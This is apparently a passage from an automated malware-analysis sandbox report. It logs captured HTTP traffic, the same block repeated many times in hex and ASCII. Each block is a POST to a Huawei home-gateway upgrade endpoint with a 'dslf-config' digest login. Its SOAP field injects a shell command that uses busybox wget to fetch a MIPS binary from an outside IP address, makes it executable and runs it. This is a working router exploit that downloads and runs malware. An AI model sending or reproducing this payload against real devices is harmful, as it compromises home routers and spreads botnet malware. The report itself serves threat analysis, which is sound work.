33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
